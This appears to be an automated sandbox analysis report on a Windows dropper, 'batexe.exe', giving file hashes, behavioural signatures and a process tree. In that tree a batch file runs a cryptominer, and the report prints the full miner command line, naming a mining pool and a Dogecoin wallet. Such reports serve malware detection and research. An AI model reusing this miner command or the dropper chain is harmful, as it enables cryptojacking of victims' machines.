Analysis
-
max time kernel
295s -
max time network
303s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-ja -
resource tags
arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
24/02/2024, 12:44
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 4036 b2e.exe 372 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 372 cpuminer-sse2.exe 372 cpuminer-sse2.exe 372 cpuminer-sse2.exe 372 cpuminer-sse2.exe 372 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/5960-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 5960 wrote to memory of 4036 5960 batexe.exe 90 PID 5960 wrote to memory of 4036 5960 batexe.exe 90 PID 5960 wrote to memory of 4036 5960 batexe.exe 90 PID 4036 wrote to memory of 4340 4036 b2e.exe 91 PID 4036 wrote to memory of 4340 4036 b2e.exe 91 PID 4036 wrote to memory of 4340 4036 b2e.exe 91 PID 4340 wrote to memory of 372 4340 cmd.exe 94 PID 4340 wrote to memory of 372 4340 cmd.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5960 -
C:\Users\Admin\AppData\Local\Temp\5285.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\5285.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5285.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\560F.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:372
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.9MB
MD55b367d7ac847a1df26622d49f95f4232
SHA1818985e44a0f9f615eead56dae5fa13a11e00964
SHA256f1b8691c36809fc807689967a864f887f2325a75631fb54dc028143c17a7fb42
SHA51208e1f37abab823da8cb53a2f591cfe1cda0e6b12e47e4ed13eac348030fac4f47943b085b68978b95c0876c24b5df1e42614c148fdb74d5101175f7bd3f31a39
-
Filesize
704KB
MD52bb8bf63c7d7958f71f9307c8635131f
SHA12362f18b011bd1e60fa078052821edefa33b8e08
SHA25685151a35fd2a7ef587918c4702b2adbe0c3e7eed43bc8564a662ed03a6f3ce79
SHA51259eba9edea2b2af76f261db76b15912b20070d75db7cf498d55a1bc13f11692d016c9a70ed447a784c874f6d11582112312f3d058443606eb4b6de349a4857ec
-
Filesize
1.2MB
MD53737596abe51ffeb82a91a07a6513435
SHA17080b07ba1eba5e7547c57d1ed89e1346e7fb7a9
SHA256f32e37f1f2d80ebc3a3753a6a049fe823d59377f581e65f2b605e4dd1ec0991a
SHA512e19496b41df3bcd36fea23579e49e21d6fa83e80a1f77fa3a501bb418e91fa3dc69fe49cf171b220cf6995242a66ad130b647f89f4cc3fac3669f0537391cf56
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.5MB
MD5f2c2e8ea628e87720b62a57bd0f05b4f
SHA1270b8e49b4bf41583394b70a802d41c0b61b9a89
SHA2563e0910db0ee4c40e91eb08e651a5d3f9a3c7e6c33cb5b0ad637f4d6a3e61372a
SHA512a8b8e958e46d09e3d1311b00e163602fccbf9a2eb9542ae63b4c4d33a7216305da241da497fb6f066b6eff31159a74a68643baae031e234f9149b9ecdec96da3
-
Filesize
1.5MB
MD51e535a85a3f07025a70bb59ae5560f2c
SHA115646e556a49cf2bd1de485539ff5324196a36e8
SHA2562e663776a1b9ae94d28f5167f41faceadbb9ebb35453c84c4fa3b60ecd1ed918
SHA5122d5f59fb5b4f74e85c868703ba9e3f34d05d874c7f88ca413adfe53b68772e96e8c47ed4455c6a1f3e769e75cd7b91c42e9fb25df6fc3afc430d1f7ad2f050df
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.2MB
MD5867dfa846e77cb1a76c18fc8a9dbe837
SHA1d3478d1565f484c2dd1fcaec2db6e937f4d739fa
SHA256be733fe81690b2504be4876d1822dedd3eb86853f7751614dfcb7a7cd3a56439
SHA512c9d8394d78ed98eca108159a2ada64d3a55958f219252c7ae545b3c5609c9bf07125f313c15a2202beeb104650c797372065f484087addce1184c18b80f09c34
-
Filesize
1.0MB
MD5c26048586d795849838b94d13c8e7a52
SHA1a19efb058cbbb77ef563c3f2997b032a046c3015
SHA2568a2e127861b92ebf107abadf1fc863bddf9a1d9d1e48b0841d88ef0c7d553c60
SHA512a79df32e8dafb89412deba6717365cc44e813b4c4eca10171b808fbbac13300be4df6e10912609917d0631566b371d7f9d66a2fae89b69d2cba4e492e28611cd
-
Filesize
1.1MB
MD56fa6178c948fb9cb9a66916def9d1fc5
SHA15511336cf42ad26f9d674bb5cc7c5e1572ff7835
SHA2562804558e9e39762e5a50d6b20cae50d219ac8924739e358ecfd74840fd4101e1
SHA5128fa7968ad1cfc035c89c7f7f8b92463729b70fad5108da02ce3f35740270af87f1120e2bb722bd3193d1107c2effd7f45f0b590b17b6c12967320cb15cb19bf5
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770